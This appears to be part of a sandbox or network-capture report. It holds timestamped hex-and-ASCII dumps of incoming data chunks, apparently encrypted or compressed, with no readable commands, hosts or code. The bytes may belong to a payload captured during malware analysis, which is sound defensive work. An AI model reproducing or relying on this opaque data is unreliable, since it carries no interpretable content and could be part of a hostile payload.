                                                                                                                  2023-08-29 17:16:42 UTC932INData Raw: 47 1c 99 d4 ba 0c a5 53 38 a1 09 b3 4a cd 51 d2 4e bd 19 5b 45 0c c9 a4 4c 2f 9a f0 45 4d f0 e6 c5 41 df d0 45 a0 37 41 c4 4a 5c 25 44 c8 87 fd 30 49 80 40 b7 48 f2 d7 dc 1b 64 27 c0 1b 31 53 38 85 59 b1 41 09 5b 50 38 03 1e 90 59 9c 19 e6 ce 14 99 d5 ad 41 61 a4 1a 09 18 a0 31 10 7f 50 b2 8a 19 2f 4a cc a8 90 43 49 16 66 86 19 f1 3a 3d b4 99 2f c0 89 40 df c1 d6 59 d4 44 c9 11 bf 30 56 7f 53 be 71 11 df c6 c6 d8 de 00 91 92 9d 45 95 16 74 84 4a d8 30 46 49 90 95 9d c0 54 0c ae 05 19 ba 45 23 13 2f 30 95 e6 50 30 91 f1 fa d3 b4 e6 51 40 d9 4c 0c ae 7c 1b c6 30 15 1b c5 61 5b 60 d2 50 3d 57 d6 55 4d d8 c0 a5 4d 92 2b c6 59 f1 6b b0 4b e6 d0 69 91 90 8d b9 b6 5c d0 a1 46 ae 13 c6 a1 29 49 05 48 5c 08 54 1c c5 52 73 4c d0 90 7c 3d 04 91 73 ea ef 91 73 48 13
                                                                                                                  Data Ascii: GS8JQN[EL/EMAE7AJ\%D0I@Hd'1S8YA[P8YAa1P/JCIf:=/@YD0VSqEtJ0FITE#/0P0Q@L|0a[`P=WUMM+YkKi\F)IH\TRsL|=ssH
                                                                                                                  2023-08-29 17:16:42 UTC936INData Raw: 45 4b 6d db 45 ca d1 f0 cc 0f 15 39 8a c8 98 10 8d 48 7f 79 49 48 d9 d1 05 3c 10 86 ad 3a d0 70 4b a2 19 d5 ce 0f 11 59 43 b6 6f d0 5d b6 6f d8 13 a1 e6 69 04 29 1b 80 ad 1f e2 2e 24 6e 22 50 82 c0 5f d4 4a cd 9d 91 42 4c d9 93 3a 09 5b 52 30 06 4f 38 f3 90 b9 d4 80 08 d4 b2 44 8a 58 11 25 48 54 19 04 f8 78 d3 82 08 1c 68 e4 14 93 d0 05 4d 3d 52 79 cb 6c d7 45 c8 57 dc 45 69 19 d0 c4 01 67 c8 45 29 83 a5 51 a8 0e d8 45 3d 14 b6 ec 49 1d a5 42 e9 de 96 5d 49 09 b0 5f 47 79 90 44 ad 26 c3 b2 91 02 10 c6 a9 19 c0 c6 89 09 d9 03 45 90 d0 3b 4d 9a 18 ba 16 47 13 0d a1 93 59 e5 45 d9 f0 a4 d7 11 88 ad 30 5e f0 7d 69 3e 36 24 60 69 e9 6c 4a b9 1a 05 52 3d d3 c5 39 9a 3c c1 59 92 70 95 c2 44 dc 13 c9 32 d0 7c 34 09 59 08 b1 90 8d 45 b5 6d f1 7c 34 0d a4 59 2d 22
                                                                                                                  Data Ascii: EKmE9HyIH<:pKYCo]oi).$n"P_JBL:[R0O8DX%HTxhM=RylEWEigE)QE=IB]I_GyD&E;MGYE0^}i>6$`ilJR=9<YpD2|4YEm|4Y-"
                                                                                                                  2023-08-29 17:16:42 UTC940INData Raw: 00 fd 49 38 21 0f c4 92 ea 79 79 df c1 15 18 d7 b3 49 5f 50 38 a9 6e a5 4e c0 19 8d a1 c0 44 14 cc 3c d1 d0 ae 40 90 a5 a1 c0 6c 14 45 c0 44 18 2f 40 f1 20 f1 4a f9 e6 95 64 0e 2f 30 fd f1 f1 07 30 e9 a7 30 f1 f1 c9 35 49 40 d8 1c a0 51 f1 d0 40 f1 40 f0 4a 39 d2 95 7a 90 a5 e9 c0 6c 78 45 b6 0c 3c 05 50 61 5b 38 49 dd 5d 39 f4 ad 5b 4a 23 19 d2 13 1a 94 85 f9 1b 49 d0 ce 98 d8 2a 40 ca f8 cf 05 88 f8 d6 ce 5d 8c d1 e0 b6 59 e4 4f 19 e6 c5 01 bd 80 47 45 4a 19 d0 ba 7e f1 6e 3d 48 49 4e 00 8d 90 8c c0 e1 94 d0 00 a9 49 5b 00 81 e6 a4 65 cc ad 38 08 af cb cc cc 0c 13 1c c4 63 72 60 47 7a e6 38 64 18 39 ce cc 0c bd c1 44 0f 09 d1 2d 49 ad a0 5c 31 4a 5d 00 99 09 80 ad 12 9e c2 34 c2 e9 eb 45 ba 6d c6 c6 b7 0f a5 48 40 da c6 23 50 db c6 7e ba 6c dc 5d c2 5c
                                                                                                                  Data Ascii: I8!yyI_P8nND<@lED/@ Jd/0005I@Q@@J9zlxE<Pa[8I]9[J#I*@]YOGEJ~n=HINI[e8cr`Gz8d9D-I\1J]4EmH@#P~l]\
                                                                                                                  2023-08-29 17:16:42 UTC944INData Raw: 15 c0 6c d8 a5 a1 37 11 1f 8d 09 eb b6 79 92 28 31 53 99 f5 09 6c 91 b7 ec 0b 3c 17 1a 2d 3c c0 07 55 0d b5 45 1d f1 e8 a7 6c 0d b9 5c 5d 79 c9 57 7c 95 c3 63 2e 00 49 04 01 3a 50 55 72 8b 2b c1 50 fb 6a ae 4c ef d1 c3 50 13 ba c6 50 e1 53 5c 34 fd 2f 30 63 05 b2 5c 51 7f c9 51 2d 00 2f 10 4b 11 f2 5c c0 5c c4 31 7d 22 f8 86 35 3b 18 5c 58 da c9 fc 2f 18 53 38 10 6d d5 ce 0c 0d 3b 45 47 2a 10 7c 14 fd 58 19 c9 27 2f 4a d4 d9 98 0d dd 05 d5 a6 75 03 f2 58 51 9c 10 38 4a 66 10 57 48 07 b0 55 c9 16 b0 6c 0a 47 13 41 ba 02 f0 18 8e 1d 8d a4 4d 3d ec 58 a1 e5 fa fc e2 05 c0 e2 55 42 f1 7e 72 ea 54 31 4c 59 b0 32 44 f1 02 65 4c 10 53 41 a2 29 19 49 1f 71 b5 62 4a b8 81 c6 45 22 13 38 4b 91 ce e4 49 8f a5 5e a1 b9 f2 43 6b 39 d6 54 6b 15 38 f1 49 7c db 1b 12 44
                                                                                                                  Data Ascii: l7y(1Sl<-<UEl\]yW|c.I:PUr+PjLPPS\4/0c\QQ-/K\\1}"5;\X/S8m;EG*|X'/JuXQ8JfWHUlGAM=XUB~rT1LY2DeLSA)IqbJE"8KI^Ck9Tk8I|D
                                                                                                                  2023-08-29 17:16:42 UTC948INData Raw: 05 0f 15 90 4a cc bf e2 44 1d 7b a5 80 58 4f 38 0d fa 19 10 54 1f 35 38 79 f9 19 11 54 75 db c1 13 a1 0f fc f4 48 dc c1 42 8d 08 26 05 6d 59 af 30 0c 4f 38 4a 01 1d d3 2c 01 1d 27 31 02 1d 37 b5 49 56 d4 05 c9 3d 50 31 55 f1 2f e6 92 12 f2 56 9d 12 9d a1 b6 c9 a0 30 50 19 2f 0b 4d 61 da ce 47 16 c0 f3 48 58 59 15 7e 4f 38 6f f7 a3 b0 73 f9 91 55 5c e8 2a 71 c2 0a 39 f8 04 e9 4c d8 13 a1 f9 95 d4 50 4e 70 76 b6 20 ac 61 88 33 4c 65 4f 0a 82 75 7d 0f 60 af 4c 0b 8f 86 1f 09 5b 31 6d 09 90 7d 54 f1 a6 60 15 1b 5a 13 4b f2 cc 57 cf 9e 17 c4 c9 1e 5b 8d c0 1f f3 8f 09 18 50 7e 81 90 86 41 3d 1b 50 5f 09 46 13 2f 51 71 78 54 53 62 9f 85 52 c9 8c 85 40 49 95 76 92 c9 c9 61 18 68 bf 5a a1 03 9c 4b 67 aa d5 76 01 d9 39 72 69 5f e3 85 19 1b df 17 d4 c9 cc 31 9c a8
                                                                                                                  Data Ascii: JD{XO8T58yTuHB&mY0O8J,'17IV=P1U/V0P/MaGHXY~O8osU\*q9LPNpv a3LeOu}`L[1m}T`ZKW[P~A=P_F/QqxTSbR@IvahZKgv9ri_1
                                                                                                                  2023-08-29 17:16:42 UTC952INData Raw: 00 bd e6 95 91 22 59 10 4f c4 5d c8 95 49 07 39 47 e9 99 78 c6 b2 57 af 34 46 1d 54 d0 4b 1c fa 31 28 9a 2b 55 0f 16 54 c2 cb 1f 99 31 43 19 53 be 05 6c b2 bb 0c eb d0 ae 31 93 9f 44 c9 e0 e6 45 3c 0c 5d 02 4b 99 e8 71 49 6c dd ba 0c a1 5b bd c0 19 a5 89 c0 6c 00 ae 12 99 c0 bc 7a 6c dc c7 45 2b a5 41 49 92 28 ae 03 99 29 21 3d 19 95 c5 b0 70 a4 05 c9 e0 d0 2a 3d 22 50 bc 31 6d e6 45 c9 e0 88 30 5f f2 ff bb 49 5c 23 ae 63 9a 2b 2d 3d 09 cf c6 b2 75 91 5d 3e 6d c0 45 b7 5c d3 ae 5f 94 97 44 69 99 e8 29 3d bf 50 5e b7 5c d0 be a2 1f 2e 08 bb e7 9d 45 b2 99 ad 46 49 16 54 6a 48 59 8b c5 34 ea d0 cc 34 c1 d0 30 47 92 95 ed c2 29 59 45 0c 89 53 85 4d 90 95 ed 49 99 ad be 49 90 a5 8d 8f 19 95 46 49 6c c2 cf 4e 25 d0 16 3d 11 ec 06 8f 5c 2b 6d b6 6c d4 05 48 18
                                                                                                                  Data Ascii: "YO]I9GxW4FTK1(+UT1CSl1DE<]KqIl[lzlE+AI()!=p*="P1mE0_I\#c+-=u]>mE\_Di)=P^\.EFITjHY440G)YESMIIFIlN%=\+mlH
                                                                                                                  2023-08-29 17:16:42 UTC956INData Raw: 46 c2 5c 30 cc 49 5a d4 ae 44 99 ad be 49 59 a4 41 c0 1a 3b 46 e9 91 5b 05 3c fd 2e 00 bb 5f f0 2d a2 03 9a 81 46 1a 12 4a e9 9c 96 7e 8a 7a 50 55 09 1a df c0 f6 09 c1 37 59 55 5a be aa 14 cd 81 4b cf 23 ba b9 66 00 4b 0f 22 18 37 4b 9e 81 0e da 40 d0 30 51 99 ee 60 46 9c 47 44 9b 0f 34 c5 31 18 be 4a cc 3b 5a 84 49 e9 5a 43 a9 22 55 4a 00 c9 ca ae 35 88 d2 ae 2e 7b 97 43 49 7f 53 66 49 f2 d3 83 4a 19 d0 ad 42 6e 2b ba 8e 19 42 49 99 1b 3b 1f 83 7d 88 f3 b8 16 d8 82 0c b9 01 7c a2 27 38 a7 11 6f 2b ba 38 29 13 47 3d 39 d4 63 01 19 3b 62 69 73 3b 67 9e 2d f3 52 0b 1a 91 51 2c 1d c1 56 48 64 14 44 49 6c d9 ba 3c f5 38 fe 37 15 2b ba a9 19 90 4e 57 92 95 89 48 19 a3 4d 71 5c 22 30 4a 9a d2 8d 89 1c 4c 45 3d 20 5b 08 49 81 53 24 39 e4 3b 75 ca 99 ad e5 48 6c
                                                                                                                  Data Ascii: F\0IZDIYA;F[<._-FJ~zPU7YUZK#fK"7K@0Q`FGD41J;ZIZC"UJ5.{CISfIJBn+BI;}|'8o+8)G=9c;bis;g-RQ,VHdDIl<87+NWHMq\"0JLE= [IS$9;uHl
                                                                                                                  2023-08-29 17:16:42 UTC960INData Raw: 65 1a 70 da 14 39 d1 40 5f 21 92 9d 89 09 40 da 35 ea 79 d9 00 5a 79 d1 24 40 6c e2 b4 4d 13 53 ba 5b 6a 20 d0 b6 62 40 70 0c b1 5b 43 51 eb d9 11 43 92 90 b9 ca e1 d2 44 79 13 59 00 89 16 52 86 cb 10 00 53 b6 76 df ca ca 39 51 3d 46 9d ca f5 e1 19 d4 15 51 99 fe 2f 61 7d 88 7e 99 95 d6 75 48 16 5e 47 c4 e9 d1 c6 b6 7e ae 7b ca 09 2f 2c 3d 07 10 4e 46 9c aa 40 eb 9e 2f 75 19 15 59 00 91 16 f4 c1 b5 c9 6b ac 57 19 d5 cc 0c 39 04 ce b1 92 8d f5 51 e2 fd 5d 46 9c 56 35 d2 29 f3 44 a0 9a d9 c5 49 2a 0b c5 e7 1d fd 30 42 19 5b 00 b9 7f 17 45 64 19 52 06 eb b6 d4 6e 3c 0c 2f 05 e2 10 93 4a 22 6e 35 eb 4d 9a ad 89 67 19 10 0c e9 18 50 ea 4d da 8e 00 4d 49 80 ad ad c7 53 60 18 98 f5 08 5b 19 50 ea 0e 7f 40 e6 4d 92 9d e9 b9 e6 d0 f5 3b df 68 d5 e6 0d 42 ea c9 e9
                                                                                                                  Data Ascii: ep9@_!@5yZy$@lMS[j b@p[CQCDyYRSv9Q=FQ/a}~uH^G~{/,=NF@/uYkW9Q]FV5)DI*0B[EdRn</J"n5MgPMMIS`[P@M;hB
                                                                                                                  2023-08-29 17:16:42 UTC964INData Raw: ce 1c 15 5b 47 41 92 98 51 c9 95 f0 7d 56 92 d0 8a 3d 0a 5a 44 75 78 ac 45 41 25 aa 3a 4d 35 f0 cd 49 18 91 7d 50 6c 3d 76 89 19 39 b2 49 19 d0 2f 48 e6 d0 35 4d a7 d0 47 49 19 83 45 1a 73 2f 12 1f 48 82 ad 49 c8 6d be b6 92 18 c6 8d 19 f4 7e 82 90 9d b1 3c 0e d0 ad 84 54 2b ba 8e 19 fa 4c c9 0f 38 87 49 1c 5b 45 a0 a4 d1 c5 4c 20 9d 4d 3a 17 58 5a 4d f1 7f 45 40 73 f2 ac 17 e6 d0 ba b6 22 1b 3b 0c 73 30 45 7a cb 88 b2 b8 9a 28 44 49 6b e9 c8 08 11 ed 45 4d 99 d0 45 3e 0a 38 38 69 19 cc 45 8d 22 13 31 55 de d0 89 49 d5 d0 45 a2 08 80 ad 7b 19 87 be b6 22 13 1c 3d 10 d0 82 49 c4 0d 45 49 9a 10 45 41 92 9d b1 c0 5c 28 ae 49 1a 59 18 b1 20 8d bd 3c 31 dd ad 1b 9b ce 49 c9 02 3b c6 0a 9b e5 87 62 48 2f 30 b1 18 fb ba 29 69 c4 17 a1 3b 50 6e 49 32 55 5d 89 6d
                                                                                                                  Data Ascii: [GAQ}V=ZDuxEA%:M5I}Pl=v9I/H5MGIEs/HIm~<T+L8I[EL M:XZME@s";s0Ez(DIkEME>88iE"1UIE{"=IEIEA\(IY <1I;bH/0)i;PnI2U]m
                                                                                                                  2023-08-29 17:16:42 UTC968INData Raw: 12 1e 98 b0 2f 04 09 db 8c 3d 5c 40 13 c8 19 d9 f2 08 aa 8a f3 69 68 88 43 6f 99 86 17 36 23 30 31 51 23 d0 a2 3b 1f ea a6 3e 1b d2 6d af 23 17 d5 49 da 40 45 8f 23 54 a5 3c 7b a7 90 a2 10 69 45 17 99 2f 37 4b ee 09 ce 88 29 8e 48 7d 54 f4 14 11 d8 ce b6 3d 1c e9 c5 14 15 a7 5e a1 c1 e4 77 d2 9b 83 44 49 90 e0 ad a4 62 e5 de 4b 20 b0 4f 72 da 58 5b 3d c5 90 7c 51 64 dc ad f9 6a d2 cc 49 29 3b a6 19 94 95 99 19 11 38 d5 44 09 9e 86 10 40 a5 43 59 f8 d0 85 ea 4f 38 10 6b 19 ee 45 19 85 a4 5e f9 05 d0 42 da 02 cd ad df 69 20 46 10 01 54 c6 4f 2a 10 e5 46 d9 e9 75 34 14 38 0a 49 1b 63 44 dd f2 3a 56 4f 37 c0 43 cc d9 c0 43 4b c3 32 45 ac 3a d0 45 10 f2 86 95 36 15 a2 49 59 62 dc 60 3f 15 90 44 3e 15 88 41 36 0b ac 41 70 59 c8 36 45 f1 31 76 ac 15 0c 8c 8a 1f
                                                                                                                  Data Ascii: /=\@ihCo6#01Q#;>m#I@E#T<{iE/7K)H}T=^wDIbK OrX[=|QdjI);8D@CYO8kE^Bi FTO*Fu48IcD:VO7CCK2E:E6IYb`?D>A6ApY6E1v
                                                                                                                  2023-08-29 17:16:42 UTC972INData Raw: 15 c0 6c 0c ad be 09 d1 4d 49 92 08 45 ca 5c 24 ce 0e 1d dc dc 4a 21 30 46 91 92 95 d5 bd 0a 12 13 c9 13 38 90 c9 09 83 45 42 19 83 a5 62 18 db 5e 4a 12 6e 3c 4b 12 b8 28 49 3f 50 15 4b 01 d0 16 5a 58 d1 61 a1 3b 67 b9 b6 1d f1 46 49 44 34 2f 49 0a 95 ad 17 19 86 c4 a2 c6 b3 45 49 73 50 5d 52 df 80 16 a1 19 50 55 48 99 6e 02 41 92 0a dc 1f 1a d0 84 23 25 c3 96 1b 49 38 51 a3 af 53 4f 4d 99 da 46 88 0a 80 96 1f 73 ec c5 43 cd 53 4f 4e 38 d4 4f 70 6c d8 cc c9 a4 85 b5 49 6d af ad 88 75 2c ba c4 19 95 bd 19 f1 15 0a b5 e6 90 c0 89 40 a4 48 1f 18 d0 ad 4d 4f b3 07 32 94 95 b9 19 f1 5a 9b c2 1f eb c6 4f 92 95 b9 c8 69 c0 c8 0c f5 80 85 39 94 95 fd 69 49 38 2f b1 e6 d1 4f 10 6c d0 0f c2 5e f0 7e 8f 66 d7 45 34 28 e9 30 91 67 fc ce dd 5c 28 c8 43 26 50 4f a2 14
                                                                                                                  Data Ascii: lMIE\$J!0F8EBb^Jn<K(I?PKZXa;gFID4/IEIsP]RPUHnA#%I8QSOMFsCSON8OplImu,@HMO2ZOi9iI8/Ol^~fE4(0g\(C&PO
                                                                                                                  2023-08-29 17:16:42 UTC976INData Raw: 23 b6 5c 0e 6c 29 9e 95 9f e8 88 06 e5 7e e6 af c4 69 5a a3 59 2f 92 9d 93 28 55 c4 ce 04 f9 dd 83 29 0b db bd c0 19 9d 8f 2f 90 ad 8b a2 03 d0 23 be c1 cb 85 ca 7c 18 41 49 3c d1 65 4c 19 50 ba 36 19 53 20 8d 19 59 00 85 9a 90 38 e5 19 df c0 24 39 bf ce 59 5c 1c 4a fe d9 d7 30 8f 92 d0 10 83 d8 38 55 a2 36 17 4d 0c 95 d4 a5 4c f2 ce 76 bf d3 68 24 02 a3 51 42 7a d0 10 47 69 4c c8 45 a2 16 50 45 b8 01 e3 8c 7a 19 10 76 9b 2a 26 ce 34 9d d0 4e 0c 91 b6 cc 46 7f 59 45 0e 13 5b 00 c5 90 a7 47 59 90 87 43 12 89 a0 1a 7a d4 c0 1b a1 76 8e 74 26 a2 e5 5d 09 61 c0 73 51 61 bb 75 49 ba 91 75 49 1b e7 5d 31 53 e0 45 28 0c e0 45 8b 29 d0 e3 79 19 f6 7d 51 4d a8 5e 79 19 00 f5 49 d5 d8 45 ca 19 ed 01 10 05 a8 45 46 9d d2 c7 18 39 3c 4d 46 b7 8c 61 49 1d 5b 01 6d 1d
                                                                                                                  Data Ascii: #\l)~iZY/(U)/#|AI<eLP6S Y8$9Y\J08U6MLvh$QBzGiLEPEzv*&4NFYE[GYCzvt&]asQauIuI]1SE(E)y}QM^yIEEF9<MFaI[m
                                                                                                                  2023-08-29 17:16:42 UTC980INData Raw: e7 aa 1e f0 35 b5 5d 98 65 54 58 f0 60 09 76 34 c6 57 69 3f 45 4e dc 10 16 89 79 d1 61 11 c8 10 44 96 59 d9 70 1c 9d 8d b8 89 1d 03 85 48 ce 10 40 9c 3a 10 5a 09 14 a0 ab a7 19 d1 99 0d a4 d0 5f ac 58 5d c4 0b 59 d7 05 40 41 d0 43 1b 4e 50 75 39 db 11 0c 9c 5b 4c 1d c9 db f5 45 c9 19 d0 70 48 18 5b c0 1a 59 9c 12 09 55 2e bb 4a 59 9c 05 b6 1a d0 4a cb 93 52 77 37 0b 11 05 79 c9 f0 45 4b db 51 a7 49 e6 2f ba 36 a1 d0 45 b9 19 ef 6e 8b 12 11 c6 b1 19 94 31 08 d9 ea 11 6d 1d 90 42 9b 5c 50 4c 9b 98 d9 94 c8 f8 51 4c ca 09 3a 44 c8 c0 50 4f 36 9a 29 6d 49 64 92 07 1e 4e 10 f8 1e d9 f8 ff b9 66 92 58 83 59 cd 1c 88 d3 13 45 59 14 93 ee 5b 0c 11 72 c8 92 96 cd 89 18 d4 6f 2f 16 85 45 0d 4f 45 87 40 5d d1 5f 1e d9 52 55 b1 db c3 65 8c c9 d3 c4 ab 58 c3 c6 a3 49
                                                                                                                  Data Ascii: 5]eTX`v4Wi?ENyaDYpH@:Z_X]Y@ACNPu9[LEpH[YU.JYJRw7yEKQI/6En1mB\PLQL:DPO6)mIdNfXYEY[ro/EOE@]_RUeXI
                                                                                                                  2023-08-29 17:16:42 UTC984INData Raw: 47 96 3a 02 66 9b 1f 04 66 1d 1b dd f5 b2 5b d1 90 6a 02 0f 66 96 3a 0f 66 96 3a 53 42 68 d9 96 60 e1 1e ca a4 1c 14 50 00 3b 19 0b f5 55 0b cd cd fb 19 bf e2 d9 45 a0 d1 fb 04 a3 b5 b9 52 84 24 3b 38 70 56 5b 34 90 46 0b 1a e5 0d 40 6a d0 50 19 69 d0 ce 99 a0 af 04 99 67 fb 8f c8 f3 50 35 54 12 96 94 09 4a 50 45 46 9a 57 95 49 a0 dc 7a 76 cb 89 c5 58 0b cd 35 4c 19 ca 3d ca f9 af c6 89 18 94 60 b7 a9 d1 46 89 1a 91 25 f1 32 b1 44 d9 1f 04 c5 24 e3 f0 42 3b fd 3a 42 79 47 34 e4 16 79 30 40 09 09 10 e2 7c 7b 7c bc f9 19 39 35 49 89 45 1c 80 fc 50 49 a7 69 d0 60 d9 29 db 35 49 a8 d1 ee f8 ae 50 d5 10 68 88 81 79 19 07 84 32 32 c2 1b d9 09 2a f1 15 2e 13 f8 3a 72 99 f5 38 6d 81 55 15 3c 48 df 59 dc e0 81 48 16 8a 95 59 5a df fc 76 79 8f 45 49 f0 eb 75 51 fa
                                                                                                                  Data Ascii: G:ff[jf:f:SBh`P;UER$;8pV[4F@jPigP5TJPEFWIzvX5L=`F%2D$B;:ByG4y0@|{|95IEPIi`)5IPhy22*.:r8mU<HYHYZvyEIuQ
                                                                                                                  2023-08-29 17:16:42 UTC988INData Raw: 12 ab 1b d0 5b 8a f9 92 3b 74 59 c5 c7 48 4d 30 6f 1e 79 d0 6b 74 41 ab a5 48 e8 a4 0d c9 53 3c 31 cd 53 b8 31 b6 29 96 4a ce 23 50 0f 28 6d 78 32 10 7f a4 78 d9 7b d1 27 3d e1 53 1f 59 bd f5 fd 2b 1b 88 a4 a8 6c 08 27 48 43 8c 21 4b 45 32 44 a9 1f 3f 65 39 ee e5 a4 3f ec 31 33 b4 fc a6 05 04 09 fd 0f 99 5b d4 12 a8 7e c5 f5 2a 18 07 10 a8 53 10 26 48 ee d1 5a e9 7a d1 9a aa 79 aa e7 04 1a d3 87 cb 19 f4 c4 ea 62 8a a9 6d 65 24 e6 35 7b 70 95 29 19 3e 34 aa 35 c0 78 a9 b9 d8 05 18 f9 e1 1c 2d 61 90 45 4b 41 e8 65 48 b9 e0 55 05 79 c8 45 48 d8 ee 2d 61 7a e7 55 df 69 71 3d 49 b0 89 44 09 41 e0 c5 49 fb b0 45 1e 41 b8 65 c9 19 70 44 e8 1f 8f 44 4f db d3 44 34 f9 ef 24 4b 41 50 f5 15 f4 30 eb 13 f9 e8 c3 37 e9 12 4b d6 67 54 3b 5d b1 6f d4 37 d5 d2 45 92 75
                                                                                                                  Data Ascii: [;tYHM0oyktAHS<1S1)J#P(mx2x{'=SY+l'HC!KE2D?e9?13[~*S&HZzybme$5{p)>45x-aEKAeHUyEH-azUiq=IDAIEAepDDOD4$KAP07KgT;]o7Eu
                                                                                                                  2023-08-29 17:16:42 UTC992INData Raw: bd 43 19 a4 5e ca e1 db 4a cc c6 c1 c7 43 11 5b 08 1b 34 d9 cc 41 9d 39 88 50 18 b6 ce 40 7f e0 44 5b a0 33 49 c2 19 d1 6e 75 51 a4 45 64 51 a4 53 01 16 55 e7 88 ba d2 c4 01 1d d0 00 09 33 31 40 d0 88 d3 0d 4d 59 59 b5 3a 98 19 c4 67 1d 3b 04 68 1b b0 41 b6 a3 2f fd b6 f2 a3 b3 48 b9 87 b5 48 59 20 44 4b 38 10 50 19 e6 a5 4d a1 c9 89 36 65 f2 9e f4 4e 69 d2 54 49 11 59 45 59 92 99 41 c0 51 d4 ae 49 20 53 ad 44 6d f7 0d 3d 99 c5 0d 3d 1a 98 30 62 e8 d1 e5 31 0d 5b 30 45 2b ff 59 4f 12 90 98 48 c4 c8 ae 44 ff d0 9c 55 18 09 25 11 cb c1 d5 60 0d 55 b3 0d 64 db 65 15 11 38 00 f9 05 89 f5 10 e6 a5 55 f9 1e 21 45 f7 ba d7 dd cc ef ae b6 48 a8 ce 1c 10 9a d3 25 ca fd 20 c4 a5 d8 ce 16 67 dd c0 cc cd 3d 10 d6 47 24 5e 45 69 19 10 ce 1c 09 60 43 1a 4f d0 fb fd 1b
                                                                                                                  Data Ascii: C^JC[4A9P@D[3InuQEdQSU31@MYY:g;hA/HHY DK8PM6eNiTIYEYAQI SDm==0b1[0E+YOHDU%`Ude8U!EH% g=G$^Ei`CO
                                                                                                                  2023-08-29 17:16:42 UTC996INData Raw: eb 49 b3 5b 45 e3 3c 50 5a 41 19 d0 78 48 18 a5 4a 90 25 00 61 2f 92 d4 89 a2 83 d0 49 80 f2 8c 45 30 db 3b 05 85 db 3c a5 89 19 20 00 89 f4 20 45 8a 6a 00 70 49 18 03 74 09 e9 84 60 59 9b d9 04 bb e3 00 75 c2 55 f4 49 e8 61 53 28 37 c3 85 86 31 07 93 3d 69 99 b6 4c 29 75 21 d0 c9 70 24 25 48 6d 16 3c 9f 38 d2 44 d9 24 2f 42 49 fd df 31 58 b9 d2 4d 48 98 2a e4 c8 c0 3e 39 4b 1d 09 a5 89 1d f8 8d bb 16 88 00 a9 15 06 65 59 4d d5 b5 8b 69 12 c9 4c 39 30 4a a9 0c 15 85 49 b9 d2 67 88 79 db 81 f3 f6 f1 c6 b1 19 de 30 c8 9f 50 4c cb 12 53 a9 55 7f e0 4a 5a 5d f4 a3 cc 18 d1 4d ca 5d 12 5d 08 9f 53 af 41 b8 56 03 97 48 90 15 09 1d 30 26 8c 30 1c c5 29 b9 f8 5d ca fd 20 25 66 79 c3 41 6d f1 f9 05 5b 19 19 85 58 0b 32 61 5b 3c 94 45 d8 18 c1 57 54 09 32 45 1e 0b
                                                                                                                  Data Ascii: I[E<PZAxHJ%a/IE0;< EjpIt`YuUIaS(71=iL)u!p$%Hm<8D$/BI1XMH*>9KeYMiL90JIgy0PLSUJZ]M]]SAVH0&0)] %fyAm[X2a[<EWT2E
                                                                                                                  2023-08-29 17:16:42 UTC1000INData Raw: 2e c9 18 26 96 8d 4a a4 4c 4d f1 f8 87 4e c4 08 b3 8b 59 60 30 41 ef 07 14 1f 59 d6 4a 69 1a d4 ad 44 18 d9 84 43 e6 a5 43 c9 c0 38 99 88 c7 11 86 e8 41 29 a4 49 c1 11 f4 41 89 da b1 1b e6 fa bd 63 5b c4 65 54 31 dd 55 fd ab 7e 70 6b e9 32 59 61 0c f0 b6 49 04 e0 42 3b 19 50 52 39 0e d0 45 f3 96 90 45 49 19 fb 95 64 89 ec 45 69 19 db 95 c8 e3 50 41 c9 16 4c c6 61 2b 5f c4 64 28 cc 6d b0 a9 f6 2c 39 19 89 94 48 dd 90 b7 4a 0a a6 15 4a ab d0 34 61 67 28 ce 81 9a 31 45 76 d8 31 41 88 e1 d6 ce ea 69 f5 44 e4 31 41 25 8a 1b 30 f5 49 46 10 41 fb 3f 80 30 48 33 81 77 5c 29 7a 2a ed 2c 00 47 43 c2 2e f4 49 f9 62 45 eb cd 60 45 3a ee fe 45 4a dc 50 47 5c 99 d3 13 99 80 c5 04 4a d8 51 87 4b 67 80 0f c8 e3 ac 42 49 19 a4 32 50 b9 d4 87 fa 3c f0 4d 60 86 53 45 a5 0b
                                                                                                                  Data Ascii: .&JLMNY`0AYJiDCC8A)IAc[eT1U~pk2YaIB;PR9EEIdEiPALa+_d(m,9HJJ4ag(1Ev1AiD1A%0IFA?0H3w\)z*,GC.IbE`E:EJPG\JQKgBI2P<M`SE
                                                                                                                  2023-08-29 17:16:42 UTC1004INData Raw: 24 7e d9 b3 a7 48 78 ea 6d 54 c9 b2 44 28 23 c2 65 64 19 f3 5e 31 79 e9 6c 4e 08 f0 42 61 3c 30 e6 4f c0 53 a7 5b 06 f0 51 a0 92 90 41 10 f8 01 00 49 07 8c e5 47 40 dd b5 89 1a d3 25 98 d8 31 47 4a f8 93 05 7d 31 99 65 66 45 14 a5 41 2c d8 a5 41 d8 f0 a7 4d 94 d5 f5 eb 03 84 68 1f 09 d0 47 49 1d 08 04 08 45 10 41 5c 8c 70 7c 17 79 fe 19 49 2e f8 3d 08 23 4a 98 09 13 28 45 4b f8 c3 0d 79 98 c5 ac 49 18 b0 25 49 18 30 a4 75 98 d7 a1 73 03 e8 25 49 51 50 7f 68 1d 88 25 19 6c 50 45 b0 78 d6 35 6a 1b 92 41 29 0d f8 39 01 59 94 41 e8 1a d0 03 08 34 51 46 10 75 58 d5 49 3e 30 45 aa d9 ef e5 1e 41 09 05 09 09 31 04 88 d9 c2 ba 29 14 31 45 90 39 69 1d 90 b8 84 a5 49 d5 30 46 c9 4a f4 57 f1 fa d6 50 9b 79 d2 fd d1 5e b0 44 29 1f b0 0a 11 a1 58 27 48 41 a2 bc 2a 1e
                                                                                                                  Data Ascii: $~HxmTD(#ed^1ylNBa<0OS[QAIG@%1GJ}1efEA,AMhGIEA\p|yI.=#J(EKyI%I0us%IQPh%lPEx5jA)9YA4QFuXI>0EA1)1E9iI0FJWPy^D)X'HA*
